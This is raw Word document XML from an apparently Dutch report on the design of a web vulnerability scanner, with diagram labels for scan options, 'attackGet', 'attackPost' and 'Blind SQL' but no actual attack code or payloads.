                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="056582C5" w14:textId="62443B83" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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196F0"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0E3238" w:rsidRPr="004756DF" w:rsidRDefault="000E3238">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1"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7ECB1CDC" w14:textId="5F9E0915" w:rsidR="000E3238" w:rsidRPr="004756DF" w:rsidRDefault="000E3238">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6F20"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6FC1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0E3238" w:rsidRPr="002B4F92" w:rsidRDefault="000E3238">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2"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AQS18OewIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDU0yhO3gAAAAoB&#10;AAAPAAAAAAAAAAAAAAAAANMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C69E3D5" w14:textId="34B95754" w:rsidR="000E3238" w:rsidRPr="002B4F92" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="009833D6" w:rsidRDefault="000E323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3"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ocn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LKeaHJ6AgAAZQUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANjVwPPeAAAACQEA&#10;AA8AAAAAAAAAAAAAAAAA0gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78D71850" w14:textId="3A8FCEB3" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="009833D6" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"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4"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B79FE52" w14:textId="602B7EA7" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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5"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D245261" w14:textId="0ACC1AC6" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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6"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D6B393A" w14:textId="68376A43" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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7"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="65A4E89C" w14:textId="5129A8E2" w:rsidR="000E3238" w:rsidRDefault="000E3238">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A4DC"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3077"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793F"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756B"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0E3238" w:rsidRDefault="000E323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98"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6CFED3A3" w14:textId="64607578" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRDefault="000E3238">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99"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Ex3oCAABk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BD6A130" w14:textId="0ABFD960" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0"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J/Bx1d5AgAAZAUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANmZG2rfAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAA0QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="703E66CB" w14:textId="057568E4" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"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1"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MiqsF94AgAAZQUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKslv4/gAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAA0AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67CF69F4" w14:textId="7C50A985" w:rsidR="000E3238" w:rsidRDefault="000E3238"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241096">
          <w:headerReference w:type="first" r:id="rId60"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="38" w:name="_Toc496292447"/>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8F2F4"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8"/>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p>
    <w:bookmarkStart w:id="39" w:name="_Toc496292448"/>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C9ECF"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9"/>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7C31D086"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 xml:space="preserve">doorzoekt de broncode van een website naar specifieke HTML DOM Elementen,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bookmarkStart w:id="40" w:name="_Toc496292449"/>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9C25"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bookmarkEnd w:id="40"/>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0E3238" w:rsidRPr="008840AF" w:rsidRDefault="000E3238">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2"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EsFr4sCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAsvzTedsAAAAIAQAADwAAAAAAAAAAAAAAAADjBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6DB11C20" w14:textId="6A4A826C" w:rsidR="000E3238" w:rsidRPr="008840AF" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00296464" w:rsidRDefault="000E3238">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3"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4FBD9467" w14:textId="3BCBB321" w:rsidR="000E3238" w:rsidRPr="00296464" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00296464" w:rsidRDefault="000E3238">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4"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9gFsM4sCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAIV2Wc9sAAAAHAQAADwAAAAAAAAAAAAAAAADjBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15094E2E" w14:textId="54EF43DD" w:rsidR="000E3238" w:rsidRPr="00296464" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00656854" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00656854">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>options</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-bs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-s</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-x</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-rt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="000E3238" w:rsidRPr="00D96E56" w:rsidRDefault="000E3238">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5"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D95E77D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00656854" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00656854">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>options</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>bs</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-s</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-x</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>rt</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-r</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="000E3238" w:rsidRPr="00D96E56" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>fm</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0E3238" w:rsidRPr="006B2D29" w:rsidRDefault="000E3238">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6"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3F6C0BEC" w14:textId="0CC4F184" w:rsidR="000E3238" w:rsidRPr="006B2D29" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">scan </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>url</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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AC3D"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0E3238" w:rsidRPr="006D73EA" w:rsidRDefault="000E3238">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7"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70DDCEC7" w14:textId="46A9EE2C" w:rsidR="000E3238" w:rsidRPr="006D73EA" w:rsidRDefault="000E3238">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39FC2"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70"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0E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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08"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xiY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W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40xiY3kCAABkBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAac91Ad4AAAAIAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1DEC9FA5" w14:textId="4D085A4D" w:rsidR="000E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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0F704"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0E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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09"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3SKrJYoCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAC7CrdtwAAAAIAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D7B4501" w14:textId="0EBEBCA7" w:rsidR="000E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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0"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2nStMIkCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAmtJHTt0AAAAJAQAADwAAAAAAAAAAAAAAAADhBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="162BA211" w14:textId="4D85B169" w:rsidR="000E3238" w:rsidRPr="009A3D6F" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="000E3238" w:rsidRPr="0022016D" w:rsidRDefault="000E3238">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1"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O6zrYIwCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEANdlFpd0AAAAKAQAADwAAAAAAAAAAAAAAAADkBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="09172301" w14:textId="1F51AB33" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="000E3238" w:rsidRPr="0022016D" w:rsidRDefault="000E3238">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438B4"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623FE"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4432D2">
          <w:headerReference w:type="default" r:id="rId63"/>
          <w:footerReference w:type="default" r:id="rId64"/>
          <w:headerReference w:type="first" r:id="rId65"/>
          <w:footerReference w:type="first" r:id="rId66"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="41" w:name="_Toc496292450"/>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810"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bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="2259322F" w14:textId="3E710319" w:rsidR="00470AEB" w:rsidRPr="00470AEB" w:rsidRDefault="00470AEB" w:rsidP="00470AEB"/>
    <w:p w14:paraId="2A7FABF4" w14:textId="77777777"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0E3238" w:rsidRPr="00FA2A0D" w:rsidRDefault="000E3238">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2"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g4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HbdN34H5RnnwUG7U97yjcKu3TEfHpnDJcJG&#10;42EID/iRGuqCQkdRcgD362/8iMfZRiklNS5lQf3PI3OCEv3V4NR/Gk8mcYvTYzL9mOPDXUp2lxJz&#10;rNaAvR/jCbI8kREfdE9KB9Uz3o9V9IoiZjj6LmjoyXVoTwXeHy5WqwTCvbUs3Jmt5dF0LHOcyafm&#10;mTnbDW7Aib+Hfn3Z/NX8ttioaWB1DCBVGu5Y6LaqXQNw59N6dPcpHpXLd0K9XNHlb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P/Hpg40CAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAuRgH+eIAAAALAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F17658E" w14:textId="7E734579" w:rsidR="000E3238" w:rsidRPr="00FA2A0D" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00C805F6" w:rsidRDefault="000E3238">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3"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KTpDTKMAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAM1SzWrhAAAACwEAAA8AAAAAAAAAAAAAAAAA5AQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CED1145" w14:textId="0B191AD0" w:rsidR="000E3238" w:rsidRPr="00C805F6" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00C805F6" w:rsidRDefault="000E3238">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4"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BsT8dCjAIAAI0FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQCyRbBS4gAAAAsBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77B18ECE" w14:textId="0B436850" w:rsidR="000E3238" w:rsidRPr="00C805F6" w:rsidRDefault="000E3238">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79F0F"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E3CC4"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0E3238" w:rsidRPr="00E221BC" w:rsidRDefault="000E3238">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5"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a6aw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DsfBmwF9QHnzkG3u97yZYPDcc18uGMOlxXnCQ9QuMWPVLCvKPQUJRtwP//Ej/q4QyilZI/L&#10;X1H/Y8ucoER9Nrhd55PpNF6L9Ji+/1Dgwx1LVscSs9ULwImb4KmzPJFRP6iBlA70I96peYyKImY4&#10;xq5oGMhF6E4S3jku5vOkhPfBsnBt7i2PriPMcfQf2kfmbL8fATfrBoYzwcpna9LpRksD820A2aQd&#10;ikB3qPYNwNuSJr2/g/F4Hb+T1tO1nv0C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EUVa6awCAAD1BQAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA6wfrVeEAAAALAQAADwAA&#10;AAAAAAAAAAAAAAAEBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABIGAAAAAA==&#10;" fillcolor="#ffd966 [1943]" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1E4B0152" w14:textId="7EB22096" w:rsidR="000E3238" w:rsidRPr="00E221BC" w:rsidRDefault="000E3238">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FCBF3"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6AD10"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B040"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E517"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7F03A"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0E3238" w:rsidRPr="00DC482B" w:rsidRDefault="000E3238">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6"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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BCD7439" w14:textId="1B5E900A" w:rsidR="000E3238" w:rsidRPr="00DC482B" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00086ED5" w:rsidRDefault="000E3238">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7"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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2214A2C7" w14:textId="142FD5D7" w:rsidR="000E3238" w:rsidRPr="00086ED5" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"/>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00F7510E" w:rsidR="00B06DCC" w:rsidRDefault="00E3495D" w:rsidP="00681EF4">
      <w:r>
        <w:t>Figuur 4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E6F16" w14:textId="68E93B62"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18"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Jg5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E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uC8Jg5ICAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAUAAYACAAAACEAKUAQgeAAAAAJAQAADwAAAAAAAAAAAAAAAADqBAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsFBgAAAAAEAAQA8wAAAPcFAAAAAA==&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="14F69644" w14:textId="4CE7DAB3"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241096">
          <w:headerReference w:type="default" r:id="rId69"/>
          <w:headerReference w:type="first" r:id="rId70"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.13</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="42" w:name="_Toc496292451"/>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36568"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2"/>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AAB81"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0E3238" w:rsidRPr="006D751D" w:rsidRDefault="000E3238"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19"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DzzD8Z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0E3238" w:rsidRPr="006D751D" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="006D751D" w:rsidRDefault="000E3238">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0"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FyDCHu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0E3238" w:rsidRPr="006D751D" w:rsidRDefault="000E3238">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B3B8C"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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>attackGet</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="000E3238" w:rsidRPr="005A5D92" w:rsidRDefault="000E3238">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1"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pfoYCAAC9BQAADgAAAGRycy9lMm9Eb2MueG1srFRNTxsxEL1X6n+wfC+bUFJ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8cj0ZQSegm&#10;x+MJZLgvnqydD/GzooYloeQe75dpFeurEDvoAEnBApm6uqyNyYfUM+rceLYWeG0hpbIx548AvyGN&#10;fbUxXHXWKjdXn1UiqCMiS3FrVIpg7FelQW7m458pZiqzX6ATSqOglxj2+GTaZfUS451Fjkw27oyb&#10;2pLP7OdpfGK2+j6krDs8nnCv7iTGdtHmrjqZDI2yoGqL/vHUzWBw8rLGI1+JEG+Fx9ChL7BI4g0+&#10;2tCm5NRLnC3J//zbfcJjFqDlbIMhLnn4sRJecWa+WEzJCRo4TX0+HE2OD3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Dwr&#10;aX6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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackGet</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="000E3238" w:rsidRPr="005A5D92" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackPost</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238"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2"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WGVJaY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0E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238"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3"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DmDwvX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0E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238"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4"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="156BE4F6" w14:textId="5546811A" w:rsidR="000E3238" w:rsidRPr="00DF1918" w:rsidRDefault="000E3238" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Blind SQL </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
